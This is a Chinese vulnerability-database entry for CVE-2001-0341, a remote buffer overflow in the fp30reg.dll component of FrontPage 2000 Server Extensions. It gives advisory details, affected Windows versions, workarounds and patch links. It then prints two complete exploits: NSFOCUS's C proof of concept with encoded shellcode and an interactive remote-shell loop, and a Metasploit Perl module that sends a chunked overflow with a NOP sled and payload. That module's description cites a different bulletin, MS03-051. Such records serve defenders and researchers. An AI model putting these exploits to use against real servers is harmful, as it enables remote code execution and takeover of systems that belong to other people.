CVE-2001-0341
CVSS7.5
发布时间 :2001-07-21 00:00:00
修订时间 :2016-10-17 22:10:41
NMCOE    

[原文]Buffer overflow in Microsoft Visual Studio RAD Support sub-component of FrontPage Server Extensions allows remote attackers to execute arbitrary commands via a long registration request (URL) to fp30reg.dll.


[CNNVD]Microsoft FrontPage 2000服务器扩展fp30reg.dll远程缓冲区溢出漏洞(MS01-035)(CNNVD-200107-156)

        Microsoft FrontPage 2000服务器扩展是Microsoft公司开发的用于加强IIS Web服务器的功能的软件包。
        FrontPage 2000服务器扩展软件包中带了一个动态链接库:fp30reg.dll,存在一个缓冲区溢出漏洞。如果成功地利用这个漏洞,远程攻击者可以在被攻击的主机上执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0:sp5:workstationMicrosoft Windows 4.0 sp5 workstation
cpe:/o:microsoft:windows_nt:4.0:sp6:workstationMicrosoft Windows 4.0 sp6 workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:workstationMicrosoft Windows 4.0 sp3 workstation
cpe:/o:microsoft:windows_nt:4.0:sp4:workstationMicrosoft Windows 4.0 sp4 workstation
cpe:/o:microsoft:windows_nt:4.0:sp1:workstationMicrosoft Windows 4.0 sp1 workstation
cpe:/o:microsoft:windows_nt:4.0:sp2:workstationMicrosoft Windows 4.0 sp2 workstation
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/a:microsoft:frontpage_server_extensions:2000Microsoft frontpage_server_extensions 2000
cpe:/o:microsoft:windows_nt:4.0:sp6a:serverMicrosoft Windows 4.0 sp6a server
cpe:/o:microsoft:windows_nt:4.0::enterprise_server
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp3:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp4:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP5
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP2
cpe:/o:microsoft:windows_nt:4.0:sp1:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_nt:4.0:sp6a:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp2:enterprise_server
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_nt:4.0:sp5:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP4
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP1
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstationMicrosoft Windows 4.0 sp6a workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP3
cpe:/o:microsoft:windows_nt:4.0:sp5:serverMicrosoft Windows 4.0 sp5 server
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_nt:4.0:sp6:serverMicrosoft Windows 4.0 sp6 server
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_nt:4.0:sp3:serverMicrosoft Windows 4.0 sp3 server
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_nt:4.0:sp4:serverMicrosoft Windows 4.0 sp4 server
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp1:serverMicrosoft Windows 4.0 sp1 server
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp2:serverMicrosoft Windows 4.0 sp2 server
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0341
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0341
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-156
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=99348216322147&w=2
(UNKNOWN)  BUGTRAQ  20010625 NSFOCUS SA2001-03 : Microsoft FrontPage 2000 Server Extensions Buffer Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS01-035.asp
(VENDOR_ADVISORY)  MS  MS01-035
http://www.securityfocus.com/bid/2906
(VENDOR_ADVISORY)  BID  2906
http://xforce.iss.net/static/6730.php
(UNKNOWN)  XF  frontpage-ext-rad-bo(6730)

- 漏洞信息

Microsoft FrontPage 2000服务器扩展fp30reg.dll远程缓冲区溢出漏洞(MS01-035)
高危 未知
2001-07-21 00:00:00 2012-11-28 00:00:00
远程  
        Microsoft FrontPage 2000服务器扩展是Microsoft公司开发的用于加强IIS Web服务器的功能的软件包。
        FrontPage 2000服务器扩展软件包中带了一个动态链接库:fp30reg.dll,存在一个缓冲区溢出漏洞。如果成功地利用这个漏洞,远程攻击者可以在被攻击的主机上执行任意指令。

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * FrontPage 2000 服务器扩展会被安装在下列目录(缺省在C:\)中:
        "\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\"
        您可以通过"Internet 服务管理器"检查_vti_bin目录的路径来得到准确的路径名。
        如果您发现"\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\_vti_aut\fp30reg.dll"文件存在的话,那么您的系统就可能被直接进行攻击。我们建议您删除此文件或者重新设置权限禁止任何人执行它。
        * 我们建议您将"\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\bin\fp4areg.dll"的权限也设置为禁止任何人执行。
        * 如果您不需要FrontPage 2000服务器扩展,我们强烈建议您完全删除此服务。方法是:
        1、打开一个命令行窗口,进入FPSE所在的驱动器,默认是C:\
        2、cd \Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\bin
        3、fpsrvadm -o uninstall -p all
        这个漏洞是Nsfocus安全小组发现的并提交给微软的,详细情况请参考Nsfocus安全公告:
        
        http://www.nsfocus.com/sa01-03.htm

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS01-035)以及相应补丁:
        MS01-035:FrontPage Server Extension Sub-Component Contains Unchecked Buffer
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS01-035.asp

        补丁下载:
        . Microsoft Windows NT 4.0:
        
        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038

        . Microsoft Windows 2000:
        
        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30727

- 漏洞信息 (20950)

MS Visual Studio RAD Support Buffer Overflow Vulnerability (EDBID:20950)
windows remote
2001-06-21 Verified
0 NSFOCUS Security Team
N/A [点击下载]
source: http://www.securityfocus.com/bid/2906/info

Due to an unchecked buffer in a subcomponent of FrontPage Server Extensions (Visual InterDev RAD Remote Deployment Support), a specially crafted request via 'fp30reg.dll' could allow a user to execute arbitrary commands in the context of IWAM_machinename on a host running IIS 5.0. A host running IIS 4.0, could allow the execution of arbitrary commands in the SYSTEM context. 

/*
 *  fpse2000ex.c - Proof of concept code for fp30reg.dll overflow bug.
 *  Copyright (c) 2001 - Nsfocus.com
 *
 *  DISCLAIMS:
 *  This  is a proof of concept code.  This code is for test purpose 
 *  only and should not be run against any host without permission from 
 *  the system administrator.
 * 
 *  NSFOCUS Security Team <security@nsfocus.com>
 *  http://www.nsfocus.com
 */
 
#include  <stdio.h>
#include  <sys/time.h>
#include  <sys/types.h>
#include  <netinet/in.h>
#include  <netdb.h>
#include  <signal.h>
#include  <unistd.h>
#include  <errno.h>

/* fat shellcode ;) */
char shellcode[] =
  "\xeb\x1a\x5f\x56\x56\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x5\x34"
  "\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe1\xff\xff\xff\xff\x21\x46\x2b\x46"
  "\xb6\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x4e\x5c\x55\x55\x13\xed\xa8\xaa\xaa\x12"
  "\x66\x66\x66\x66\x59\x1\x6d\x2f\x66\x5d\x55\x55\xaa\xaa\xaa\xaa\x21\xef\xa2"
  "\x21\x22\x2e\xaa\xaa\xaa\x23\x27\x62\x5d\x55\x55\x21\xff\xa2\x21\x28\x22\xaa"
  "\xaa\xaa\x23\x2f\x6e\x5d\x55\x55\x21\xe7\xa2\x21\xfb\xa2\x23\x3f\x6a\x5d\x55"
  "\x55\x43\x61\xaf\xaa\xaa\x25\x2f\x16\x5d\x55\x55\x27\x17\x5a\x5d\x55\x55\xce"
  "\xb\xaa\xaa\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x2f\x5a\x5d"
  "\x55\x55\x55\x55\x55\x55\x21\x2f\x16\x5d\x55\x55\x29\x42\xad\x23\x2f\x5e\x5d"
  "\x55\x55\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x4a\xdd\x42\xcd\xaf\xaa\xaa\x29\x17"
  "\x66\x5d\x55\x55\xaa\xa5\x2f\x77\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x2b\x6b"
  "\xaa\xaa\xab\xaa\x23\x27\x12\x5d\x55\x55\x2b\x17\x12\x5d\x55\x55\xaa\xaa\xaa"
  "\xd2\xdf\xa0\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x3f\x12\x5d\x55\x55"
  "\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x2f\x30\x70\xab\xaa\xaa\x21\x27"
  "\x12\x5d\x55\x55\x21\xfb\x96\x21\x2f\x12\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba"
  "\x2b\x53\xfa\xef\xaa\xaa\xa5\x2f\xd3\xab\xaa\xaa\x21\x3f\x12\x5d\x55\x55\x21"
  "\xe8\x96\x21\x27\x12\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x3f\x12\x5d\x55\x55\x23"
  "\x3f\x1e\x5d\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x12\x5d\x55"
  "\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x2b\x90\xe1\xef\xf8\xe4\xa5"
  "\x2f\x99\xab\xaa\xaa\x21\x2f\x6\x5d\x55\x55\x2b\xd2\xae\xef\xe6\x99\x98\xa5"
  "\x2f\x8a\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x23\x27\xe\x5d\x55\x55\x21\x3f"
  "\x1e\x5d\x55\x55\x21\x2f\x12\x5d\x55\x55\xa9\xe8\x8a\x23\x2f\x6\x5d\x55\x55"
  "\x6d\x2f\x2\x5d\x55\x55\xaa\xaa\xaa\xaa\x41\xb4\x21\x27\x2\x5d\x55\x55\x29\x6b"
  "\xab\x23\x27\x2\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x29\x68\xae\x23\x3f\x6\x5d"
  "\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\x27\x2\x5d\x55\x55\x91\xe2\xb2\xa5\x27"
  "\x6a\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8\x21\x27\x12\x5d\x55\x55\x2b"
  "\x96\xab\xed\xcf\xde\xfa\xa5\x2f\xa\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8"
  "\x21\x27\x12\x5d\x55\x55\x2b\xd6\xab\xae\xd8\xc5\xc9\xeb\xa5\x2f\x2e\xaa\xaa"
  "\xaa\x21\x3f\x2\x5d\x55\x55\xa9\x3f\x2\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55"
  "\x21\x2f\x1e\x5d\x55\x55\x21\xe2\x8e\x99\x6a\xcc\x21\xae\xa0\x23\x2f\x6\x5d"
  "\x55\x55\x21\x27\x1e\x5d\x55\x55\x21\xfb\xba\x21\x2f\x6\x5d\x55\x55\x27\xe6"
  "\xba\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55"
  "\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55\x21\x2f"
  "\x1e\x5d\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x3f\x6\x5d\x55\x55\x21\x2f\x6\x5d"
  "\x55\x55\xa9\x2f\x12\x5d\x55\x55\x23\x2f\x66\x5d\x55\x55\x41\xaf\x43\xa7\x55"
  "\x55\x55\x43\xbc\x54\x55\x55\x27\x17\x5a\x5d\x55\x55\x21\xed\xa2\xce\x9\xaa"
  "\xaa\xaa\xaa\x29\x17\x66\x5d\x55\x55\xaa\xdf\xaf\x43\xf4\xa9\xaa\xaa\x6d\x2f"
  "\x6\x5d\x55\x55\xab\xaa\xaa\xaa\x41\xa5\x21\x27\x6\x5d\x55\x55\x29\x6b\xab\x23"
  "\x27\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xa2\xd7\xc4\x21\x5e\x21\x3f\x16"
  "\x5d\x55\x55\xf8\x21\x2f\xe\x5d\x55\x55\xfa\x55\x3f\x66\x5d\x55\x55\x91\x5e"
  "\x3a\xe9\xe1\xe9\xe1\x21\x27\x6\x5d\x55\x55\x23\x2e\x27\x7a\x5d\x55\x55\x41"
  "\xa5\x21\x3f\x16\x5d\x55\x55\x29\x68\xab\x23\x3f\x16\x5d\x55\x55\x21\x2f\x16"
  "\x5d\x55\x55\xa5\x14\xa2\x2f\x63\xdf\xba\x21\x3f\x16\x5d\x55\x55\xa5\x14\xe8"
  "\xab\x2f\x6a\xde\xa8\x41\xa8\x41\x78\x21\x27\x16\x5d\x55\x55\x29\x6b\xab\x23"
  "\x27\x16\x5d\x55\x55\x43\xd0\x55\x55\x55\x6d\x2f\x8e\x5d\x55\x55\xa6\xaa\xaa"
  "\xaa\x6d\x2f\x82\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x2f\x86\x5d\x55\x55\xab\xaa"
  "\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xe2\x5d\x55\x55"
  "\xfa\x27\x27\xe6\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
  "\xe9\xe1\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xea\x5d\x55\x55"
  "\xfa\x27\x27\xee\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
  "\xe9\xe1\x27\x17\xca\x5d\x55\x55\x99\x6a\x13\xbb\xaa\xaa\xaa\x58\x1\x6d\x2f"
  "\x26\x5d\x55\x55\xab\xab\xaa\xaa\xcc\x6d\x2f\x3a\x5d\x55\x55\xaa\xaa\x21\x3f"
  "\xee\x5d\x55\x55\x23\x3f\x32\x5d\x55\x55\x21\x2f\xe2\x5d\x55\x55\x23\x2f\x36"
  "\x5d\x55\x55\x21\x27\xe2\x5d\x55\x55\x23\x27\xa\x5d\x55\x55\x6d\x2f\x6\x5d\x55"
  "\x55\xaa\xaa\xaa\xaa\x21\x5e\x27\x3f\xfa\x5d\x55\x55\xf8\x27\x2f\xca\x5d\x55"
  "\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa\x21\x27\x16\x5d\x55"
  "\x55\xfb\xc0\xaa\x55\x3f\x72\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x2f"
  "\x6\x5d\x55\x55\x21\x3f\x16\x5d\x55\x55\x29\x68\xa2\x23\x3f\x16\x5d\x55\x55"
  "\x21\x5e\xc0\xaa\xc0\xaa\x27\x2f\x96\x5d\x55\x55\xfa\xc2\xaa\xa2\xaa\xaa\x27"
  "\x27\x56\x5d\x55\x55\xfb\x21\x3f\xe6\x5d\x55\x55\xf8\x55\x3f\x4a\x5d\x55\x55"
  "\x91\x5e\x3a\xe9\xe1\xe9\xe1\x6d\x2f\x6\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e"
  "\xc0\xaa\x27\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\x29\x6b\xa3\xfb"
  "\x21\x3f\x6a\x5d\x55\x55\xf8\x55\x3f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
  "\xe1\x12\xab\xaa\xaa\xaa\x2f\x6a\xa5\x2e\xf4\xab\xaa\xaa\x21\x5e\xc0\xaa\xc0"
  "\xaa\x27\x27\x96\x5d\x55\x55\xfb\xc2\xaa\xa2\xaa\xaa\x27\x3f\x56\x5d\x55\x55"
  "\xf8\x21\x2f\xe6\x5d\x55\x55\xfa\x55\x3f\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
  "\xe9\xe1\x29\x17\x96\x5d\x55\x55\xaa\xd4\xcb\x21\x5e\xc0\xaa\x27\x27\x96\x5d"
  "\x55\x55\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27"
  "\xe6\x5d\x55\x55\xfb\x55\x3f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29"
  "\x17\x96\x5d\x55\x55\xaa\xd4\x8c\x21\x5e\xc0\xaa\x27\x3f\x96\x5d\x55\x55\xf8"
  "\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x62\x5d\x55"
  "\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x68\xaa\xaa\xaa\x6d\x2f\x96\x5d\x55\x55"
  "\xaa\xa2\xaa\xaa\x21\x5e\x27\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55"
  "\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
  "\xe9\xe1\x23\x2f\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xab\xde\xf2\x6d\x2f\x6"
  "\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x6\x5d\x55\x55\xf8\x21"
  "\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\xfb\x21\x3f\xea\x5d\x55\x55"
  "\xf8\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x12\xab\xaa\xaa\xaa"
  "\x2f\x6a\xde\xbc\x21\x5e\xc2\x55\x55\x55\xd5\x55\x3f\x46\x5d\x55\x55\x91\x5e"
  "\x3a\xe9\xe1\xe9\xe1\x41\x4b\x41\x87\x21\x5e\xc0\xaa\x27\x27\x96\x5d\x55\x55"
  "\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\xea\x5d"
  "\x55\x55\xfb\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x3f\x54"
  "\x55\x55\x41\x54\xf2\xfa\x21\x17\x16\x5d\x55\x55\x23\xed\x58\x69\x21\xee\x8e"
  "\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\x9a"
  "\x50\x55\x55\xe9\xd8\xcf\xcb\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde"
  "\xcf\xfa\xd8\xc5\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce"
  "\xc6\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa\xf8\xcf"
  "\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3\xc6\xcf\xaa\xf9\xc6"
  "\xcf\xcf\xda\xaa\xaa\xc9\xc7\xce\x84\xcf\xd2\xcf\xaa\xa7\xa0\xcf\xd2\xc3\xde"
  "\xa7\xa0\xaa\xf2\xe5\xf8\xee\xeb\xfe\xeb\xaa";



int
resolv (char *host, long *ip)
{
      struct hostent *hp;

      if ((*ip = inet_addr (host))<0) 
      {
        if ((hp = gethostbyname (host)) == NULL)
        {
          fprintf (stderr, "%s: unknown host\n", host);
          exit (-1);
        }
       *ip = *(unsigned long *) hp->h_addr;
     }
  return 0;
}

int
connect_to (char *hostname, short port)
{
  struct sockaddr_in sa;
  int s;

  s = socket (AF_INET, SOCK_STREAM, 0);
  resolv (hostname, (long *) &sa.sin_addr.s_addr);
  sa.sin_family = AF_INET;
  sa.sin_port = htons (port);
  if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == -1)
    {
       perror("connect");
       exit(-1);
   }

  return s;
}



void
runshell (int sockd)
{
  char buff[1024];
  int ret;
  fd_set fds;

  printf("\nPress CTRL_C to exit the shell!\n");
  for (;;)
    {

      FD_ZERO (&fds);
      FD_SET (0, &fds);
      FD_SET (sockd, &fds);

      if (select (sockd + 1, &fds, NULL, NULL, NULL) < 0)
        {
          exit (-1);
        }

      if (FD_ISSET (sockd, &fds))
        {
          bzero (buff, sizeof buff);
           if ((ret=read(sockd,buff,sizeof(buff)))<1)
            {
              fprintf (stderr, "Connection closed\n");
              exit (-1);
            }
          write(1,buff,ret);
        }

      if (FD_ISSET (0, &fds))
        {
          bzero (buff, sizeof buff);
          ret=read(0,buff,sizeof(buff));
          write(sockd,buff,ret);
        }
    }
}



main (int argc, char **argv)
{
  char overbuff[400];
  char buff[4096];

/* If system has the unicode bug, it is possible to attack fp4areg.dll */
/* char fppath[] = "/_vti_bin/..%c1%9cbin/fp4areg.dll"; */

  char fppath[] = "/_vti_bin/_vti_aut/fp30reg.dll";
  char server[] = "www.blahblah.com";
  char retaddress[] = "\x62\x18\xd5\x67";
  char jmpshell[] = "\xff\x66\x78";
  int  i, sockfd;
  int port = 80;

  if (argc < 2)
    {
      printf ("Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security Team\n\n");
      printf ("Usage: %s victim [port]\n", argv[0]);
      exit (-1);
    }

  if (argc > 2) port = atoi (argv[2]);

  sockfd = connect_to (argv[1], port);

  bzero (overbuff, sizeof (overbuff));
  bzero (buff, sizeof (buff));
  memset (overbuff, 'a', 258);
  memcpy (overbuff, jmpshell, strlen (jmpshell));
  strcpy (overbuff + 258, "%c");
  for (i = 0; i < 0x50; i += 4)
      strncat (overbuff, retaddress, 4);
  strcat (overbuff, "aaa");

  sprintf (buff,
           "GET %s?%s HTTP/1.1 \nHOST:%s\r\nContent-Type: \
text/html\nContent-Length:%d\r\nProxy_Connection: Keep-Alive\r\n\r\n%s",
           fppath, overbuff, server, strlen (shellcode), shellcode);
  printf ("buff len = %d\n", strlen (buff));

  write (sockfd, buff, strlen (buff));
  printf ("payload sent!\n");

  if(read (sockfd, buff, strlen(buff))<0)
  {
    printf("EOF\n");
    exit(-1);
  }
  else 
  {
    if(memcmp(buff,"XORDATA",8)==0)
    {
     printf("exploit succeed\n");
     /* Press Enter key to get the command prompt */
     runshell (sockfd);
    }
    else
    {
     printf("exploit failed\n");
     close(sockfd);
     exit(-1);
    }
  }

}

		

- 漏洞信息 (20951)

MS Visual Studio RAD Support Buffer Overflow Vulnerability (metasploit) (EDBID:20951)
windows remote
2001-06-21 Verified
0 NSFOCUS Security Team
N/A [点击下载]
source: http://www.securityfocus.com/bid/2906/info
 
Due to an unchecked buffer in a subcomponent of FrontPage Server Extensions (Visual InterDev RAD Remote Deployment Support), a specially crafted request via 'fp30reg.dll' could allow a user to execute arbitrary commands in the context of IWAM_machinename on a host running IIS 5.0. A host running IIS 4.0, could allow the execution of arbitrary commands in the SYSTEM context. 

package Msf::Exploit::frontpage_fp30reg_chunked;
use base "Msf::Exploit";
use strict;

my $advanced = { }; 

my $info =
{
    'Name'  => 'Frontpage fp30reg.dll Chunked Encoding',
    'Version'  => '$Revision: 1.19 $',
    'Authors' => [ 'H D Moore <hdm [at] metasploit.com> [Artistic License]', ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32' ],
    'Priv'  => 0,
    'UserOpts'  => {
                    'RHOST' => [1, 'ADDR', 'The target address'],
                    'RPORT' => [1, 'PORT', 'The target port', 80],
                    'SSL'   => [0, 'BOOL', 'Use SSL'],
                },

    'Payload' => {
                 'Space'  => 1024,
                 'BadChars'  => "\x00+&=%\x0a\x0d\x20",
               },
    
    'Description'  => qq{
        This is an exploit for the chunked encoding buffer overflow
        described in MS03-051 and originally reported by Brett
        Moore. This particular modules works against versions of
        Windows 2000 between SP0 and SP3. Service Pack 4 fixes the
        issue.
    },
              
    'Refs'  =>  [  
                    'http://www.osvdb.org/577',
		            'http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx'
                ],
    'DefaultTarget' => 0,
    'Targets' => [
                   ['Windows 2000 SP0-SP3',  0x6c38a4d0],   # from mfc42.dll
                   ['Windows 2000 07/22/02', 0x67d44eb1],   # from fp30reg.dll 07/22/2002
                   ['Windows 2000 10/06/99', 0x67d4665d],   # from fp30reg.dll 10/06/1999
                 ],
};

sub new {
  my $class = shift;
  my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  return($self);
}

sub Exploit {
    my $self = shift;

    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   =$self->GetVar('EncodedPayload')->Payload;
  
    my @targets;
    my @offsets;
    my $pad;

    my $ret = defined($target_idx) ? ($self->Targets->[ $target_idx ]->[1]) : $self->Targets->[0]->[1];
    my $pattern = Pex::PatternCreate(0xDEAD);
    
    my $count = 0;
    while (1)
    {
        if ($count % 3 == 0)
        {
            $self->PrintLine("[*] Refreshing remote process...");
            my $res = $self->Check();
            $count = 0;
        }

        substr($pattern, 128, 4, pack("V", $ret));
        substr($pattern, 264, 4, pack("V", $ret));
        substr($pattern, 160, 7, "\x2d\xff\xfe\xff\xff" . "\xff\xe0");
        substr($pattern, 280, 512, "\x90" x 512);
        substr($pattern, 792, length($shellcode), $shellcode);

        my $request;
        $request  = "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
        $request .= "Host: $target_host:$target_port\r\n";
        $request .= "Transfer-Encoding: chunked\r\n";
        $request .= "\r\n";
        $request .= "DEAD\r\n";
        $request .= $pattern . "\r\n";
        $request .= "0\r\n";

        my $s = Msf::Socket->new( {"SSL" => $self->GetVar('SSL')} );
        if (! $s->Tcp($target_host, $target_port))
        {
            $self->FatalError("Could not connect: " . $s->GetError());
            return;
        }

        $self->PrintLine("[*] Sending exploit request...");
        $s->Send($request);
        sleep(1);
        $s->Close();
        $count++;
    }
    return;
}

sub Check {
    my ($self) = @_;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    
    my $getreq = "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n".
                 "Host: $target_host:$target_port\r\n\r\n";
 
    my $s = Msf::Socket->new( {"SSL" => $self->GetVar('SSL')} );
    
    if (! $s)
    {
       $self->PrintLine("[*] Could not create the socket");
       return(0);
    }
    
    if (! $s->Tcp($target_host, $target_port))
    {
        $self->PrintLine("[*] Could not connect: " . $s->GetError());
        return(0);
    }
    
    $s->Send($getreq);
    my $res = $s->Recv(-1, 10);
    $s->Close();
    
    if ($res !~ /501 Not Implemented/)
    {
        $self->PrintLine("[*] Frontpage component was not found");
        return(0);
    }

    $self->PrintLine("[*] Frontpage component found");
    return(1);

}

		

- 漏洞信息

577
FrontPage Server Extensions Visual Studio RAD Support Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Microsoft Front Page Server Extensions (FPSE), included in IIS Web Server, contain a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a sub-component in FPSE called Visual Studio Remote Application Deployment (RAD) which allows Visual InterDev users to register and un-register programming components on the IIS server. The sub-component contains an unchecked buffer that may allow an attacker to execute arbitrary code with IUSR_Machine privileges.

- 时间线

2001-06-25 2001-04-13
2001-06-25 Unknow

- 解决方案

Microsoft has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workarounds: Delete or prevent access to fp30reg.dll and fp4areg.dll

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

